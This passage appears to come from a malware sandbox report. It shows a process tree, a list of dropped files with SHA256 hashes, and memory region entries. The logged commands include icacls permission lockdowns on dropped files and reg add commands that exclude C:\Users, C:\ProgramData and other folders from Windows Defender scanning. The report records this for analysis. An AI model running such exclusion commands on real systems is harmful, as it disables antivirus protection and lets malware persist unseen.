                                  cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw\n4aPkw.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:2188
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\n4aPkw\n4aPkw.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:1572
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw\n4aPkw.exe" /grant:r Users:(RX) /deny Users:(DE)
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:1632
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\n4aPkw\n4aPkw.exe" /grant:r Users:(RX) /deny Users:(DE)
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:816
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw\image.png" /inheritance:r
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  PID:1332
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\n4aPkw\image.png" /inheritance:r
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:2592
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  PID:3496
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\n4aPkw\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:4760
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  PID:3540
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\n4aPkw\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:2916
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw\thumbs.db" /inheritance:r
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:4452
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\n4aPkw\thumbs.db" /inheritance:r
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:4572
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  PID:2232
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    4⤵
                                      PID:1904
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\n4aPkw\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:3172
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    PID:1560
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\n4aPkw\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:3336
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw\XPSPLOG.dll" /inheritance:r
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    PID:3544
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\n4aPkw\XPSPLOG.dll" /inheritance:r
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:372
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    PID:2468
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\n4aPkw\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:3528
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\n4aPkw\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    PID:1168
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\n4aPkw\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:3764
                              • C:\Windows\system32\cmd.exe
                                cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\4Lf89e" /t REG_DWORD /d 0 /f
                                1⤵
                                • Executes a command shell one-liner
                                • Suspicious use of WriteProcessMemory
                                PID:4732
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\4Lf89e" /t REG_DWORD /d 0 /f
                                  2⤵
                                  • Windows security bypass
                                  PID:1636
                              • C:\Windows\system32\cmd.exe
                                cmd.exe
                                1⤵
                                  PID:2928
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:2956
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:1068
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:4564
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:556
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:4804
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:4720
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:868
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:1800
                                • C:\Program Files (x86)\n4aPkw\n4aPkw.exe
                                  "C:\Program Files (x86)\n4aPkw\n4aPkw.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:2420
                                • C:\Program Files (x86)\n4aPkw\n4aPkw.exe
                                  "C:\Program Files (x86)\n4aPkw\n4aPkw.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:3788
                                • C:\Program Files (x86)\j86P6\CM3fp7q21.exe
                                  "C:\Program Files (x86)\j86P6\CM3fp7q21.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:4988
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:4132
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:2828
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  PID:3716
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:4568

                                Network

                                      MITRE ATT&CK Enterprise v16

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      e587c9e.rbs

                                      • Path C:\Config.Msi\e587c9e.rbs
                                      • Size 7KB
                                      • SHA256 a0c1de6ca9b3620e5964a84a0c596fa79b2c432ec750c0973d410df0766aa2f7
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      XPSPLOG.dll

                                      • Path C:\Program Files (x86)\j86P6\XPSPLOG.dll
                                      • Size 4.6MB
                                      • SHA256 5071ce4bc58a6e228691f2d0950a3f8ca1d21856f8fd6feff77eeae63000e5fb
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      image.png

                                      • Path C:\Program Files (x86)\j86P6\image.png
                                      • Size 4.9MB
                                      • SHA256 05f204c473b29594972ee65ad74ae7cf53e304ee440f8d753c59d96a4092723d
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      XPSPLOG.dll

                                      • Path C:\Program Files (x86)\n4aPkw\XPSPLOG.dll
                                      • Size 4.6MB
                                      • SHA256 b6663f3accef677469242408f69b81f24f3922b07c52c173c1a59c849f4af7e4
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      image.png

                                      • Path C:\Program Files (x86)\n4aPkw\image.png
                                      • Size 4.9MB
                                      • SHA256 675ae6a522341264dc1716b936539a3be251db4045d51f6d9fa1f5a7760f5fe3
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      n4aPkw.exe

                                      • Path C:\Program Files (x86)\n4aPkw\n4aPkw.exe
                                      • Size 145KB
                                      • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      thumbs.db

                                      • Path C:\Program Files (x86)\n4aPkw\thumbs.db
                                      • Size 358KB
                                      • SHA256 eb151f11375d4ff25f2e530ab23b555935e1c044670840690c9eca581f67b0b0
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      __PSScriptPolicyTest_1xjl5yj5.13z.ps1

                                      • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xjl5yj5.13z.ps1
                                      • Size 60B
                                      • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                      • MD5 SHA1 SHA512 TLSH

                                      UxEnhance64.dll

                                      • Path C:\Users\Public\4Lf89e\UxEnhance64.dll
                                      • Size 3.1MB
                                      • SHA256 0dcd435d96ca65a72c11192ce0b7e1f186fe48a652fbce985e0fd2f7034705cc
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      aIDPCH.exe

                                      • Path C:\Users\Public\4Lf89e\aIDPCH.exe
                                      • Size 135KB
                                      • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      adoresd.dat

                                      • Path C:\Users\Public\4Lf89e\adoresd.dat
                                      • Size 4.8MB
                                      • SHA256 b3f9b510347ed794900fa58adaad5bfe39f10663f1b49b791902af5ed688ce29
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      msadox.tb

                                      • Path C:\Users\Public\4Lf89e\msadox.tb
                                      • Size 8KB
                                      • SHA256 46563e15029ef5a64e2d300f01d2763b05441c0eaef04f66bfb881a945fe770f
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      destopbak.ini

                                      • Path C:\Users\Public\Music\destopbak.ini
                                      • Size 2B
                                      • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                      • MD5 SHA1 SHA512

                                      MSI7E63.tmp

                                      • Path C:\Windows\Installer\MSI7E63.tmp
                                      • Size 8.1MB
                                      • SHA256 af060787bb7d895d649eb2a91c55dcf747e702f346dfdf5841f4f91e52ece71f
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      e587c9d.msi

                                      • Path C:\Windows\Installer\e587c9d.msi
                                      • Size 8.1MB
                                      • SHA256 ade315680071e86ff610d0e11f97042245ec40d3f31ec4eca6a970e84861b0d2
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      metadata-2

                                      • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                      • Size 24.1MB
                                      • SHA256 bb45ae83b3f9311a9ee293abbaff3b0c6306b70a5b5d16def5f74bc0e2a0086f
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      {f7a88021-7014-4f85-9e91-014d8160e2ea}_OnDiskSnapshotProp

                                      • Path \??\Volume{cd0aa2ae-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{f7a88021-7014-4f85-9e91-014d8160e2ea}_OnDiskSnapshotProp
                                      • Size 6KB
                                      • SHA256 a8c8d0c193d9b52b469df9b340da289540000bb185e6516ae32422e95c877178
                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                      xxxx.ini

                                      • Path \??\c:\xxxx.ini
                                      • Size 2B
                                      • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                      • MD5 SHA1 SHA512

                                      memory/1776-38-0x00007FFD06C50000-0x00007FFD06C60000-memory.dmp

                                      memory/1776-16-0x00007FFD06C50000-0x00007FFD06C60000-memory.dmp

                                      memory/1776-13-0x00007FFCF9030000-0x00007FFCF9696000-memory.dmp

                                      memory/1776-12-0x00007FFD170B0000-0x00007FFD170B2000-memory.dmp

                                      memory/2384-276-0x0000000006340000-0x0000000006694000-memory.dmp

                                      memory/2384-291-0x0000000007C70000-0x0000000007C8A000-memory.dmp

                                      memory/2384-277-0x0000000006960000-0x000000000697E000-memory.dmp

                                      memory/2384-264-0x0000000003370000-0x00000000033A6000-memory.dmp

                                      memory/2384-280-0x000000006EBD0000-0x000000006EC1C000-memory.dmp

                                      memory/2384-268-0x00000000062D0000-0x0000000006336000-memory.dmp

                                      memory/2384-267-0x0000000006170000-0x00000000061D6000-memory.dmp

                                      memory/2384-266-0x0000000005990000-0x00000000059B2000-memory.dmp

                                      memory/2384-279-0x0000000007B50000-0x0000000007B82000-memory.dmp

                                      memory/2384-288-0x0000000006F10000-0x0000000006F2E000-memory.dmp

                                      memory/2384-265-0x0000000005B40000-0x0000000006168000-memory.dmp

                                      memory/2384-294-0x0000000007E70000-0x0000000007E81000-memory.dmp

                                      memory/2384-289-0x0000000007B90000-0x0000000007C33000-memory.dmp

                                      memory/2384-293-0x0000000007EF0000-0x0000000007F86000-memory.dmp

                                      memory/2384-292-0x0000000007CE0000-0x0000000007CEA000-memory.dmp

                                      memory/2384-290-0x00000000082C0000-0x000000000893A000-memory.dmp

                                      memory/2384-278-0x0000000006990000-0x00000000069DC000-memory.dmp

                                      memory/2420-230-0x00000000748D0000-0x000000007501A000-memory.dmp

                                      memory/2420-228-0x0000000000690000-0x0000000000691000-memory.dmp

                                      memory/2888-200-0x0000000010000000-0x0000000010061000-memory.dmp

                                      memory/2888-179-0x0000000001580000-0x0000000001581000-memory.dmp

                                      memory/2888-184-0x0000000003BD0000-0x00000000043B9000-memory.dmp

                                      memory/2888-212-0x0000000003BD0000-0x00000000043B9000-memory.dmp

                                      memory/2888-225-0x0000000003BD0000-0x00000000043B9000-memory.dmp

                                      memory/2888-181-0x0000000003BD0000-0x00000000043B9000-memory.dmp

                                      memory/2888-191-0x0000000004540000-0x0000000004554000-memory.dmp

                                      memory/2888-195-0x0000000003BD0000-0x00000000043B9000-memory.dmp

                                      memory/2888-260-0x0000000003BD0000-0x00000000043B9000-memory.dmp

                                      memory/2888-172-0x0000000001410000-0x0000000001411000-memory.dmp

                                      memory/2888-177-0x0000000003BD0000-0x00000000043B9000-memory.dmp

                                      memory/2888-173-0x00000000748D0000-0x000000007501A000-memory.dmp

                                      memory/3788-237-0x0000000000F80000-0x0000000000F81000-memory.dmp

                                      memory/3788-238-0x00000000748D0000-0x000000007501A000-memory.dmp

                                      memory/4480-60-0x00007FFD170C0000-0x00007FFD170C2000-memory.dmp

                                      memory/4480-67-0x000001A703BE0000-0x000001A70449E000-memory.dmp

                                      memory/4480-52-0x00007FFD170B0000-0x00007FFD170B2000-memory.dmp

                                      memory/4480-53-0x00007FFCF9180000-0x00007FFCF969E000-memory.dmp

                                      memory/4480-58-0x000001A703BE0000-0x000001A70449E000-memory.dmp

                                      memory/4480-61-0x000001A703BE0000-0x000001A70449E000-memory.dmp

                                      memory/4480-66-0x000001A703BE0000-0x000001A70449E000-memory.dmp

                                      memory/4480-77-0x000001A7044A0000-0x000001A7044EE000-memory.dmp

                                      memory/4480-86-0x000001A703BE0000-0x000001A70449E000-memory.dmp

                                      memory/4480-87-0x000001A703BE0000-0x000001A70449E000-memory.dmp

                                      memory/4480-78-0x000001A7048E0000-0x000001A70496A000-memory.dmp

                                      memory/4480-79-0x000001A7048E0000-0x000001A70496A000-memory.dmp

                                      memory/4480-80-0x000001A7048E0000-0x000001A70496A000-memory.dmp

                                      memory/4480-81-0x000001A7048E0000-0x000001A70496A000-memory.dmp

                                      memory/4480-72-0x000001A703BE0000-0x000001A70449E000-memory.dmp

                                      memory/4480-68-0x000001A703BE0000-0x000001A70449E000-memory.dmp

                                      memory/4480-65-0x000001A703BE0000-0x000001A70449E000-memory.dmp

                                      memory/4988-255-0x00000000034B0000-0x0000000003C99000-memory.dmp

                                      memory/4988-248-0x0000000072550000-0x0000000072C9A000-memory.dmp

                                      memory/4988-247-0x0000000000B90000-0x0000000000B91000-memory.dmp

                                      memory/4988-252-0x00000000034B0000-0x0000000003C99000-memory.dmp

                                      memory/4988-258-0x0000000000B90000-0x0000000000B91000-memory.dmp

                                      memory/4988-254-0x0000000000BB0000-0x0000000000BB1000-memory.dmp